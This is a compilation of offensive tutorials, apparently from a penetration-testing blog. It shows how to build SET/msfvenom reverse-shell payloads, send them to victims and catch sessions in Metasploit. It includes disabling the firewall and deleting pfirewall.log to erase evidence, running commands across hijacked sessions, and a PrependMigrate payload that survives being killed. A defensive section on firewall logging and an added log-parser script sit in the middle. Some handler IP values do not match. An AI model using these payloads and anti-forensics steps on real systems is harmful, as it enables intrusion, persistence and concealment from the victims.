Capture VNC Session of Remote PC using Settoolkit

Today in this article we are going to compromise the target through a VNC payload attack. It is a very simple method for beginners.
In this tutorial we will learn how to create a VNC payload using the Social Engineering Toolkit and try to obtain a VNC shell on the victim's PC.
Let’s Start!!!
Open a terminal in Kali Linux and type "setoolkit" to start the Social Engineering Toolkit framework.
Select the first option to choose from the list of Social-Engineering Attacks.
Press '1'
To proceed further, choose the "Create a Payload and Listener" option.
Press '4'
This shows an arsenal of different payloads. As our focus in this article is VNC, we select the VNC payload.
Press '3'
The next step asks for the IP address on which the payload listener is to be started; in our case it is 192.168.1.109 (the attacker's IP). After that it asks for the port of the reverse listener; in our case it is 4444.
After this is set, it generates the VNC payload and saves it under the highlighted path, /root/.set/payload.exe. Send the payload.exe file to the target.
Next it asks whether to start the payload listener. Type "yes" and hit Enter; this starts loading the Metasploit Framework.
After the Metasploit Framework has loaded, it runs the multi handler automatically. Once the victim clicks on the payload file sent by the attacker, the attacker gets a VNC shell.
Great!!!!
Our VNC attack using the SET toolkit is successful and we have received the victim's VNC shell on our system.

How to Delete Firewall Log in Remote PC using Metasploit

This article is only for tutorial purposes, where we share our experience to enhance the skills of IT researchers. It will help attackers protect themselves if they are caught by a firewall. Usually, when an attacker establishes a connection with the target's system, a log is generated containing details such as the time, ports, IP address and MAC address of the attacker. So if you are not aware of this, you might leave evidence of your attacks on the victim's system. To prevent this, go through this article, where you will learn how to read firewall logs as well as how to delete the logs from the victim's PC.

Being an intelligent attacker, once you have hacked the target and fetched the important data, the most essential thing is to read and delete the log files from the target system.
First hack the victim PC (read here).

So now we are inside windows/system32, where we can perform admin-level tasks. Type the following command inside the CMD shell to move into the logs directory:

cd logfiles/firewall
Type dir to list the contents of the firewall directory.
dir

From the screenshot you can see that there are two files and two directories; as an attacker I need to check the firewall log on the target PC. Now type the following command to read the firewall log:
type pfirewall.log


So the highlighted log line shows the MAC address of the attacker's system. Hence, to protect yourself, always delete these logs.
To delete pfirewall.log we must first turn off the firewall; type the following command to disable the firewall on the victim PC:
netsh firewall set opmode mode=DISABLE


Now type the command below to delete pfirewall.log:
del pfirewall.log


Now type the command below to verify whether pfirewall.log is still present on the victim's PC:
type pfirewall.log

How to Enable and Monitor Firewall Log in Windows PC

LETS START!!!

Let's have a look at the firewall security settings. Open Windows Firewall, then select Advanced settings on the left side under Control Panel Home.


Here we are at Windows Firewall with Advanced Security; open its Properties entry on the right side of the window frame.


Now the Local Computer Properties dialog box has opened; here select the Private Profile tab.


Another dialog box appears in front of you to configure the private profile of the firewall.

We need to change only two things in this profile, without disturbing the other settings. Change "No (default)" to "Yes" for both Log dropped packets and Log successful connections, as shown in the screenshot. Finally click OK.

Now we are back at the advanced security settings of the firewall; move your cursor down to the Monitoring option. From the screenshot you can see the window frame for firewall monitoring, which contains General and Logging Settings. As we want to read the firewall logs, click on the blue link given as File name under Logging Settings.


GREAT!!! Finally we can read the firewall log and investigate firewall traffic in our network.
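Reading the log by eye works for a handful of lines, but the file grows quickly once successful connections are logged. Below is an added example, not part of the original tutorial, of a small Python parser for the pfirewall.log format read in this section and in the previous one: it keys each line by the names in the #Fields header, counts ALLOW and DROP entries per peer address, lists the allowed outbound connections, and reports a log that has a header but no entries (the state a truncated or recreated log is left in). The sample log text, its addresses and ports are all constructed for the example.

```python
"""Added example (not part of the original tutorial): a small parser for the
Windows Firewall log (pfirewall.log), which uses the W3C extended log
format. It summarises ALLOW/DROP entries per peer address, lists allowed
outbound connections, and reports a log that is present but empty.
The sample log below is constructed; its addresses and ports are made up."""
from collections import Counter

# Constructed sample in the format Windows Firewall writes once both
# "Log dropped packets" and "Log successful connections" are set to Yes.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path

2017-03-10 10:15:32 ALLOW TCP 192.168.1.105 192.168.1.109 49153 4444 0 - 0 0 0 - - - SEND
2017-03-10 10:15:40 DROP TCP 192.168.1.109 192.168.1.105 50111 445 52 S 1234567 0 8192 - - - RECEIVE
2017-03-10 10:16:02 DROP UDP 192.168.1.50 192.168.1.105 137 137 78 - - - - - - - RECEIVE
2017-03-10 10:16:10 ALLOW TCP 192.168.1.105 192.168.1.109 49154 4444 0 - 0 0 0 - - - SEND
"""


def parse_firewall_log(text):
    """Return (field_names, entries). Field names come from the '#Fields:'
    header line; each entry is a dict keyed by those names. Lines whose
    column count does not match the header are skipped, not guessed at."""
    fields = None
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            continue  # data before a header cannot be interpreted
        parts = line.split()
        if len(parts) != len(fields):
            continue
        entries.append(dict(zip(fields, parts)))
    return fields, entries


def summarize_by_peer(entries):
    """Count entries per (action, peer address). The peer is dst-ip for
    SEND (outbound) entries and src-ip for RECEIVE (inbound) entries."""
    counts = Counter()
    for e in entries:
        peer = e["dst-ip"] if e["path"] == "SEND" else e["src-ip"]
        counts[(e["action"], peer)] += 1
    return counts


def allowed_outbound(entries):
    """Sorted, de-duplicated (dst-ip, dst-port) pairs for ALLOW/SEND
    entries: the 'successful connections' the profile setting turns on."""
    pairs = {(e["dst-ip"], e["dst-port"])
             for e in entries if e["action"] == "ALLOW" and e["path"] == "SEND"}
    return sorted(pairs)


def log_health(text):
    """Findings a reviewer wants before trusting the log: a missing header
    means no usable log; a header with no entries means logging is on but
    nothing was recorded (or the file was emptied)."""
    fields, entries = parse_firewall_log(text)
    if fields is None:
        return ["no #Fields header found"]
    if not entries:
        return ["header present but no entries"]
    return []


if __name__ == "__main__":
    _, rows = parse_firewall_log(SAMPLE_LOG)
    for key, n in sorted(summarize_by_peer(rows).items()):
        print(key, n)
    print("allowed outbound:", allowed_outbound(rows))
    print("health:", log_health(SAMPLE_LOG))
```

To run it on a real log, read the file with `open(path, encoding="utf-8", errors="replace").read()` and pass the text to `parse_firewall_log`; the field names are taken from the file's own header, so a log written by a different Windows version with a different column set is still parsed correctly.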

Run OS Command in Multiple Session in Metasploit

Again we are sharing our experience with our visitors to enhance their skills and ability. In this article you will learn how to manage multiple sessions from different targets in a network. Once you have hacked more than one system in a network and received multiple Meterpreter sessions in your Kali Linux, how will you retrieve data simultaneously from all targets?

LET'S PROCEED!!!
First an attacker needs to create a payload and share it in the network with his targets, then start the multi handler in the Metasploit Framework. Now when the targets open the payload on their systems, the attacker receives a series of sessions.

Here you can see from the given screenshot that I have received two sessions from different systems.

msf exploit(handler) > sessions


In order to gather information from both targeted systems, I used a post-exploitation module which lets an attacker run the same command against multiple sessions.

This module executes an arbitrary command line in the chosen session.
msf exploit(handler) > use post/multi/general/execute
msf post(execute) > set command ipconfig
msf post(execute) > set session 1
msf post(execute) > exploit

In the given screenshot you can see that I executed ipconfig to learn the network configuration of session 1; the result shows the target IP 192.168.0.100.


In the next step I only need to change the session from 1 to 2 so that I can see the network configuration of session 2 as well; here the result shows the target IP 192.168.0.105.

msf post(execute) > set session 2
msf post(execute) > exploit

Hiding Shell with Prepend Migrate using Msfvenom

If you are a network penetration tester then you must read this article to enhance your skills. It is part of advanced penetration testing and might help in creating a strong payload for an attack on the targeted system. In this article you will learn more about the strength of msfvenom; here we will create a payload that is different from my previous tutorial. The payload migrates its process if the current process gets killed, hence the attacker will not lose his session if the victim kills the current process ID of the payload on their system.

LETS!!! START
Open the terminal in Kali Linux and type the following command to generate an exe payload (the option names are case-insensitive; the process option is PrependMigrateProc):
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.104 lport=5555 prependmigrate=true prependmigrateproc=explorer.exe -f exe > /root/Desktop/raj.exe
The above command creates the raj.exe file on the Desktop; now send this file to the remote system for the attack.


Load the Metasploit Framework and type the following commands to start the attack.
msfconsole
use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit

When the victim opens the raj.exe file we get a Meterpreter session.

meterpreter> sysinfo


Now let's check the process ID of our payload.
meterpreter> ps
From the highlighted text you can read the process ID shown for raj.exe, i.e. 4960.


Now the attacker kills the current process of raj.exe himself to verify process migration; as a result process 4960 gets killed.
meterpreter> kill 4960

But!!! We still have the victim's session, which means raj.exe has migrated into a new process ID.
meterpreter> sysinfo